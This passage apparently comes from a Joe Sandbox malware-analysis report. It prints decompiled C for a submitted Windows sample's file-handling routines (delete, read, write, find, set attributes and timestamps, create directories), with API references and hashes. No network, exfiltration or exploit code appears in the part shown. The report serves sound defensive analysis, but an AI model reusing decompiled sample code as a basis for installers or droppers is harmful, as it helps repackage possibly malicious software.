                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ChangeCloseCreateFileFindNotification
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 727422849-0
                                                                                                                            • Opcode ID: 9807379ff81c3d490cf68a83d96df0eb8ecc633cde6dd9f935d588c58eaabe44
                                                                                                                            • Instruction ID: d556d6ed1a1370b11f352619dc192e4bd69da4566a87ece580b0bc5f49a6e668
                                                                                                                            • Opcode Fuzzy Hash: 9807379ff81c3d490cf68a83d96df0eb8ecc633cde6dd9f935d588c58eaabe44
                                                                                                                            • Instruction Fuzzy Hash: D0E04F360002196BCF115F64AC01BCE3B95EF19360F14452ABA24A62E0C7728461AF94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404643 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00404643(WCHAR* __ecx, void* __eflags) {
				signed int _t7;
				signed int _t8;
				void* _t10;
				WCHAR* _t15;

				_t15 = __ecx;
				_t7 = E00404DA0(__ecx);
				if(_t7 == 0xffffffff || (_t7 & 0x00000010) != 0 || (_t7 & 0x00000001) == 0) {
					L5:
					_t8 = DeleteFileW(_t15); // executed
					return _t8 & 0xffffff00 | _t8 != 0x00000000;
				} else {
					_t10 = E00404462(__ecx, _t7 & 0xfffffffe);
					if(_t10 != 0) {
						goto L5;
					} else {
						return _t10;
					}
				}
			}







                                                                                                                            0x00404644
                                                                                                                            0x00404646
                                                                                                                            0x0040464e
                                                                                                                            0x0040466a
                                                                                                                            0x0040466b
                                                                                                                            0x00404677
                                                                                                                            0x00404658
                                                                                                                            0x0040465f
                                                                                                                            0x00404666
                                                                                                                            0x00000000
                                                                                                                            0x00404669
                                                                                                                            0x00404669
                                                                                                                            0x00404669
                                                                                                                            0x00404666

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00404DA0: GetFileAttributesW.KERNELBASE(?,004050D2,?,?,0000002A,0000005C,?,?,?,00000001), ref: 00404DA1
                                                                                                                            • DeleteFileW.KERNELBASE(?,?,0040479E,?,?,?,0000005C,?,?,75C182C0,?,00000000), ref: 0040466B
                                                                                                                              • Part of subcall function 00404462: SetFileAttributesW.KERNELBASE(?,00000000,004047EE,?,75C182C0,?,00000000), ref: 00404464
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Attributes$Delete
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3735447641-0
                                                                                                                            • Opcode ID: 4af3f9c4ac87f317a383e19ebbf4be1568d8f498abffe729fc2456daa46237b6
                                                                                                                            • Instruction ID: c98f3abb563ab1bb48d32cbdf2bd3b216670aee835f997c4b583ea26d8f2b8e7
                                                                                                                            • Opcode Fuzzy Hash: 4af3f9c4ac87f317a383e19ebbf4be1568d8f498abffe729fc2456daa46237b6
                                                                                                                            • Instruction Fuzzy Hash: 50D02B61101120018DE0297C38057DB12050ED33347148B77FEA0F23D1EB7E8C83009C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004054CD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 86%
                                                                                                                            			E004054CD(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				long _t12;
				signed int _t14;
				void** _t16;

				_t16 = __ecx;
				_push(__ecx);
				_t12 =  *0x41f0b8; // 0x400000
				if(_a8 > _t12) {
					_a8 = _t12;
				}
				_v8 = _v8 & 0x00000000;
				_t14 = WriteFile( *_t16, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t14 & 0xffffff00 | _t14 != 0x00000000;
			}







                                                                                                                            0x004054cd
                                                                                                                            0x004054d0
                                                                                                                            0x004054d1
                                                                                                                            0x004054d9
                                                                                                                            0x004054db
                                                                                                                            0x004054db
                                                                                                                            0x004054e4
                                                                                                                            0x004054f0
                                                                                                                            0x004054fe
                                                                                                                            0x00405504

                                                                                                                            APIs
                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 004054F0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3934441357-0
                                                                                                                            • Opcode ID: 8754c39352e6b572958dd94eb4906f8bfe997afb7bdf6dd0c5210f13dd38fcb2
                                                                                                                            • Instruction ID: 32868f3a29a398ab14785254ccb1bf50569d93ec041cad7fd8186f98d882653d
                                                                                                                            • Opcode Fuzzy Hash: 8754c39352e6b572958dd94eb4906f8bfe997afb7bdf6dd0c5210f13dd38fcb2
                                                                                                                            • Instruction Fuzzy Hash: B7E0E579600208FFCB11CF95C801BCE7BFAEB08355F20C069F9189A260D339AA55DF58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040810E Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 72%
                                                                                                                            			E0040810E(intOrPtr __ecx) {
				void* _t8;
				void* _t17;
				intOrPtr _t19;

				E00418D80(E00419B38, _t17);
				_push(__ecx);
				_push(__ecx);
				 *(_t17 - 4) =  *(_t17 - 4) & 0x00000000;
				 *((intOrPtr*)(_t17 - 0x10)) = _t19;
				 *((intOrPtr*)(_t17 - 0x14)) = __ecx;
				_t8 = E0040814D(__ecx, 0); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t17 - 0xc));
				return _t8;
			}






                                                                                                                            0x00408113
                                                                                                                            0x00408118
                                                                                                                            0x00408119
                                                                                                                            0x0040811a
                                                                                                                            0x00408121
                                                                                                                            0x00408126
                                                                                                                            0x00408129
                                                                                                                            0x00408133
                                                                                                                            0x0040813c

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 00408113
                                                                                                                              • Part of subcall function 0040814D: __EH_prolog.LIBCMT ref: 00408152
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3519838083-0
                                                                                                                            • Opcode ID: 9eca010d204422902fe07f867e60df36874e4cd661f802f806a107c05fca104b
                                                                                                                            • Instruction ID: 0ca9ab5b8f1d60bd9c73bc96d98377938e635d19cdb4d5b29e0664e23227e72b
                                                                                                                            • Opcode Fuzzy Hash: 9eca010d204422902fe07f867e60df36874e4cd661f802f806a107c05fca104b
                                                                                                                            • Instruction Fuzzy Hash: 9AD01271950208EBD7149B49E902BDEB778EB41758F10452FF00165180C7B95A008669
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004053C1 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E004053C1(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				signed int _t11;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t11 & 0xffffff00 | _t11 != 0x00000000;
			}





                                                                                                                            0x004053c4
                                                                                                                            0x004053cb
                                                                                                                            0x004053d7
                                                                                                                            0x004053e5
                                                                                                                            0x004053eb

                                                                                                                            APIs
                                                                                                                            • ReadFile.KERNELBASE(000000FF,?,?,00000000,00000000,000000FF,?,0040540C,?,?,00000000,?,00405432,?,?,00000000), ref: 004053D7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2738559852-0
                                                                                                                            • Opcode ID: 7680b6ca8a144e951c888a795149d2d53928818e18071b104f126b41f4adbd68
                                                                                                                            • Instruction ID: bc519ebe3b5b6386e9621bf61f3413b29384c9a634b5b939dab0404262013cc0
                                                                                                                            • Opcode Fuzzy Hash: 7680b6ca8a144e951c888a795149d2d53928818e18071b104f126b41f4adbd68
                                                                                                                            • Instruction Fuzzy Hash: 76E0EC75200208FBCB01CF90CC01FCE7BB9FB49754F20C058E91596160D375AA14EB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404BEE Relevance: 1.5, APIs: 1, Instructions: 17fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00404BEE(void** __ecx, intOrPtr _a4) {
				struct _WIN32_FIND_DATAW _v596;
				int _t5;

				_t5 = FindNextFileW( *__ecx,  &_v596); // executed
				if(_t5 != 0) {
					E00404B8C( &_v596, _a4, __eflags);
					return 1;
				}
				return 0;
			}





                                                                                                                            0x00404c00
                                                                                                                            0x00404c08
                                                                                                                            0x00404c17
                                                                                                                            0x00000000
                                                                                                                            0x00404c1c
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • FindNextFileW.KERNELBASE(000000FF,?), ref: 00404C00
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFindNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2029273394-0
                                                                                                                            • Opcode ID: c4609d8de41ccdaab4e1c7bc9efeac1eeb3cd6958e8da37b1abb75d29d41c6c1
                                                                                                                            • Instruction ID: 6514850b34d96ac27011973a87a4576330e77776678e8d48275e438d2eb40076
                                                                                                                            • Opcode Fuzzy Hash: c4609d8de41ccdaab4e1c7bc9efeac1eeb3cd6958e8da37b1abb75d29d41c6c1
                                                                                                                            • Instruction Fuzzy Hash: FBD05B701041189BDB10DF60CC499AB777CABD1349F1040759A05E71A0D639D949DBAD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00410E73 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 37%
                                                                                                                            			E00410E73(void* __ecx) {
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t12;

				E00418D80(E0041A622, _t12);
				_push(__ecx);
				_push(0x188);
				_t10 = E004031DD();
				 *((intOrPtr*)(_t12 - 0x10)) = _t10;
				_t7 = 0;
				_t15 = _t10;
				 *((intOrPtr*)(_t12 - 4)) = 0;
				if(_t10 != 0) {
					_t7 = E0040DCA3(_t10, _t15); // executed
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t12 - 0xc));
				return _t7;
			}






                                                                                                                            0x00410e78
                                                                                                                            0x00410e7d
                                                                                                                            0x00410e7e
                                                                                                                            0x00410e89
                                                                                                                            0x00410e8b
                                                                                                                            0x00410e8e
                                                                                                                            0x00410e90
                                                                                                                            0x00410e92
                                                                                                                            0x00410e95
                                                                                                                            0x00410e97
                                                                                                                            0x00410e97
                                                                                                                            0x00410e9f
                                                                                                                            0x00410ea7

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 00410E78
                                                                                                                              • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                                                                                                              • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                                                                                                              • Part of subcall function 0040DCA3: __EH_prolog.LIBCMT ref: 0040DCA8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$ExceptionThrowmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3744649731-0
                                                                                                                            • Opcode ID: bd17aa57d55e5f7ba60f60e0126942ef50211aff7d8658aad84ef683687c9bb7
                                                                                                                            • Instruction ID: cba1e8ea3cc59bc4478667252af174c53adf0a6d33d98c46e50d2fdcf3a083dd
                                                                                                                            • Opcode Fuzzy Hash: bd17aa57d55e5f7ba60f60e0126942ef50211aff7d8658aad84ef683687c9bb7
                                                                                                                            • Instruction Fuzzy Hash: 81D05E71F042849BCB08FFF994227AD76A0AB48348F00853FE012E67C0DFB85A808A19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405298 Relevance: 1.5, APIs: 1, Instructions: 16COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00405298(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindCloseChangeNotification(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}






                                                                                                                            0x00405299
                                                                                                                            0x0040529b
                                                                                                                            0x004052a0
                                                                                                                            0x004052b4
                                                                                                                            0x004052b7
                                                                                                                            0x004052a2
                                                                                                                            0x004052a3
                                                                                                                            0x004052ab
                                                                                                                            0x004052b1
                                                                                                                            0x00000000
                                                                                                                            0x004052ad
                                                                                                                            0x004052b0
                                                                                                                            0x004052b0
                                                                                                                            0x004052ab

                                                                                                                            APIs
                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,000000FF,0040526A,?,?,0040538F,?,80000000,00000000,00000000,00000000,004053B0,00000000,?,00000003,00000080), ref: 004052A3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2591292051-0
                                                                                                                            • Opcode ID: a70d0e270c00220fc0e1caf0f16e22cd4a5fb1ec1f3136ff0860332eb57d27a1
                                                                                                                            • Instruction ID: 0e5df7a028251fcaba9f82fb0a08b03a75193d26b760c08bd3ff78e88b2aa95c
                                                                                                                            • Opcode Fuzzy Hash: a70d0e270c00220fc0e1caf0f16e22cd4a5fb1ec1f3136ff0860332eb57d27a1
                                                                                                                            • Instruction Fuzzy Hash: 46D0C93110556146DE646E3C78449C337999E0633432147AAF4B0E62E1D3748C835E94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404B27 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00404B27(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindClose(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}






                                                                                                                            0x00404b28
                                                                                                                            0x00404b2a
                                                                                                                            0x00404b2f
                                                                                                                            0x00404b43
                                                                                                                            0x00404b46
                                                                                                                            0x00404b31
                                                                                                                            0x00404b32
                                                                                                                            0x00404b3a
                                                                                                                            0x00404b40
                                                                                                                            0x00000000
                                                                                                                            0x00404b3c
                                                                                                                            0x00404b3f
                                                                                                                            0x00404b3f
                                                                                                                            0x00404b3a

                                                                                                                            APIs
                                                                                                                            • FindClose.KERNELBASE(00000000,000000FF,00404B58), ref: 00404B32
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFind
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1863332320-0
                                                                                                                            • Opcode ID: 2e7c38b74275a1d10db6fabc292f24c9b7c881a734d2f7bbb3c64b0cccd58694
                                                                                                                            • Instruction ID: b412e42f3085da2f257a58cf6b4c1cc416868627b9fbf021317bc8eabdf38f56
                                                                                                                            • Opcode Fuzzy Hash: 2e7c38b74275a1d10db6fabc292f24c9b7c881a734d2f7bbb3c64b0cccd58694
                                                                                                                            • Instruction Fuzzy Hash: F4D0127150412147CA742E3CB845AC377E85A86330325176BF6B0E32E4D374DC834694
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004054A0 Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 58%
                                                                                                                            			E004054A0(void** __ecx, FILETIME* _a4, FILETIME* _a8, FILETIME* _a12) {
				signed int _t4;

				_t4 = SetFileTime( *__ecx, _a4, _a8, _a12); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}




                                                                                                                            0x004054ae
                                                                                                                            0x004054b6
                                                                                                                            0x004054ba

                                                                                                                            APIs
                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?,004054CA,00000000,00000000,?,00402482,?), ref: 004054AE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1425588814-0
                                                                                                                            • Opcode ID: d00ba419ea0ae4e6e6213418fd014f6d5999ef0473a0d56b55522c41bf13b527
                                                                                                                            • Instruction ID: 1917584adf27ce0176f88e11aa52cbd2cdf9234270b8d6b477bb5c626fe98c97
                                                                                                                            • Opcode Fuzzy Hash: d00ba419ea0ae4e6e6213418fd014f6d5999ef0473a0d56b55522c41bf13b527
                                                                                                                            • Instruction Fuzzy Hash: 56C04C36158205FF8F020F70CC04C1ABFE2EB99311F10C918B169C4070C7328024EB02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404826 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 58%
                                                                                                                            			E00404826(WCHAR* __ecx) {
				signed int _t1;

				_t1 = SetCurrentDirectoryW(__ecx); // executed
				asm("sbb eax, eax");
				return  ~( ~_t1);
			}




                                                                                                                            0x00404827
                                                                                                                            0x0040482f
                                                                                                                            0x00404833

                                                                                                                            APIs
                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,00401490,?,00000001,?,00419240,?,0041B524,;!@InstallEnd@!,?,0041B558,?,00000000,?,?,00000000), ref: 00404827
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentDirectory
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1611563598-0
                                                                                                                            • Opcode ID: d57684e69020114d10183d2ca0050567171a42a80b8fd26bd4e5665bc9280296
                                                                                                                            • Instruction ID: fec01ce8eb217bf0cfbecdd44f93909942d88e708ff386734e9f039800b2ffe1
                                                                                                                            • Opcode Fuzzy Hash: d57684e69020114d10183d2ca0050567171a42a80b8fd26bd4e5665bc9280296
                                                                                                                            • Instruction Fuzzy Hash: CCA002B07F511B468E241B34DD0986A39549555A037115B687157C50D4DF25C1045554
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404462 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00404462(WCHAR* __ecx, long __edx) {
				signed int _t3;

				_t3 = SetFileAttributesW(__ecx, __edx); // executed
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                                                                                            0x00404464
                                                                                                                            0x0040446f

                                                                                                                            APIs
                                                                                                                            • SetFileAttributesW.KERNELBASE(?,00000000,004047EE,?,75C182C0,?,00000000), ref: 00404464
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: ed25a719a3732e43e41dd9887838c0a6c9a1d2c5f1583ac5206a53767c946853
                                                                                                                            • Instruction ID: 98a8bcf7e5ee3235dfc47f65db57e9ddc409942bd55006f53268cdc163f6fd1c
                                                                                                                            • Opcode Fuzzy Hash: ed25a719a3732e43e41dd9887838c0a6c9a1d2c5f1583ac5206a53767c946853
                                                                                                                            • Instruction Fuzzy Hash: 02A002A02112099FA6145B315E09B6F29ADEDC9AD1745C96C7415C5060EB29C8509565
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040447D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040447D(WCHAR* __ecx) {
				signed int _t3;

				_t3 = CreateDirectoryW(__ecx, 0); // executed
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                                                                                            0x00404480
                                                                                                                            0x0040448b

                                                                                                                            APIs
                                                                                                                            • CreateDirectoryW.KERNELBASE(00000000,00000000,00404A06,00000000,?,00000000,00404A99,?,00000000), ref: 00404480
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
